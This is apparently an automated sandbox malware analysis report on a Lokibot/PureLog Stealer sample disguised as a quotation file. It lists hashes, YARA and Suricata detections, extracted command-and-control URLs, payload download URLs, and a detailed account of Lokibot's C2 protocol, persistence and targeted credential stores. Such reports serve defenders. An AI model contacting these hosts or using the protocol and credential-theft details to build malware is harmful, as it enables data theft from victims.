Edit tour

Windows Analysis Report
rQuotation.exe

Overview

General Information

Sample name:	rQuotation.exe
Analysis ID:	1576016
MD5:	dca8bdefe8237a48128806ff688ac05a
SHA1:	6ebb0844c2d34d0fcc21a903d43757a5d238273d
SHA256:	c390804ad264760c94d771b4e8326ba728624673b6900d664d2faff699480fc2
Tags:	exeuser-Porcupine
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

rQuotation.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\rQuotation.exe" MD5: DCA8BDEFE8237A48128806FF688AC05A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
rQuotation.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19b2e:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
sslproxydump.pcap	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x558b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
sslproxydump.pcap	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x152dd:$des3: 68 03 66 00 00 0x19b2e:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19bfa:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1402328648.0000000000582000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1453520487.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7b1f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7940:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x354f:$des3: 68 03 66 00 00 0x7940:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7a0c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17960:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4d2b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1356f:$des3: 68 03 66 00 00 0x17960:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17a2c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: rQuotation.exe PID: 7704	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: rQuotation.exe PID: 7704	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: rQuotation.exe PID: 7704	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6cf5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x11a8a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.rQuotation.exe.2aed364.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.rQuotation.exe.2aed364.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.0.rQuotation.exe.580000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.rQuotation.exe.3a79570.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.rQuotation.exe.3a79570.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.rQuotation.exe.3a79570.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.rQuotation.exe.3a79570.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.rQuotation.exe.3a79570.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.rQuotation.exe.3a79570.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.rQuotation.exe.3a79570.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.rQuotation.exe.3a79570.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rQuotation.exe.3a79570.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.rQuotation.exe.3a79570.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.rQuotation.exe.3a79570.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.rQuotation.exe.3a79570.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.rQuotation.exe.3a79570.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 11 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T13:15:07.027308+0100	2803305	3	Unknown Traffic	192.168.2.9	49708	172.67.153.63	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://dddotx.shop/BISH_New.exe8https://dddotx.shop/DLLL.dll	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/BISH_New.exe	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dll:	Avira URL Cloud: Label: malware
Source: https://dddotx.shop	Avira URL Cloud: Label: malware
Source: http://dddotx.shop	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: rQuotation.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rQuotation.exe

Joe Sandbox ML: detected

Source: rQuotation.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.153.63:443 -> 192.168.2.9:49707 version: TLS 1.2

Source: rQuotation.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Bish.pdb source: rQuotation.exe
Source:	Binary string: Bish.pdbX source: rQuotation.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: global traffic	HTTP traffic detected: GET /BISH_New.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DLLL.dll HTTP/1.1Host: dddotx.shop

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49708 -> 172.67.153.63:443

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /BISH_New.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DLLL.dll HTTP/1.1Host: dddotx.shop

Source: global traffic

DNS traffic detected: DNS query: dddotx.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Dec 2024 12:15:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrUfkhZHRhS0TV%2FAYhx84ulZmJvShe2x0RbiW3L2rSBKhmRW2Bcnlm%2FBMQEqtwQ1eQmu1AFFYk8r59dYcA3S%2FyltYhdh7UNYCd0I4xWtbQd3qP8L2XvcUamAZFpgqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f2e98d3ec9332e4-EWR

Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dddotx.shop
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dddotx.shopd
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rQuotation.exe, 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/BISH_New.exe
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/BISH_New.exe8https://dddotx.shop/DLLL.dll
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/DLLL.dll
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/DLLL.dll:
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.1453520487.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: rQuotation.exe, 00000000.00000002.1453520487.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 172.67.153.63:443 -> 192.168.2.9:49707 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.rQuotation.exe.2aed364.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.rQuotation.exe.2aed364.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1453520487.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: rQuotation.exe PID: 7704, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: rQuotation.exe

Source: C:\Users\user\Desktop\rQuotation.exe	Code function: 0_2_00D614D8	0_2_00D614D8
Source: C:\Users\user\Desktop\rQuotation.exe	Code function: 0_2_00D614C7	0_2_00D614C7
Source: C:\Users\user\Desktop\rQuotation.exe	Code function: 0_2_00D61238	0_2_00D61238
Source: C:\Users\user\Desktop\rQuotation.exe	Code function: 0_2_00D61228	0_2_00D61228

Source: rQuotation.exe, 00000000.00000002.1452848123.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rQuotation.exe
Source: rQuotation.exe, 00000000.00000000.1402345937.00000000005A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBish.exe* vs rQuotation.exe
Source: rQuotation.exe	Binary or memory string: OriginalFilenameBish.exe* vs rQuotation.exe

Source: rQuotation.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: sslproxydump.pcap, type: PCAP	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.rQuotation.exe.2aed364.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.rQuotation.exe.2aed364.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.rQuotation.exe.3a79570.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.rQuotation.exe.3a79570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
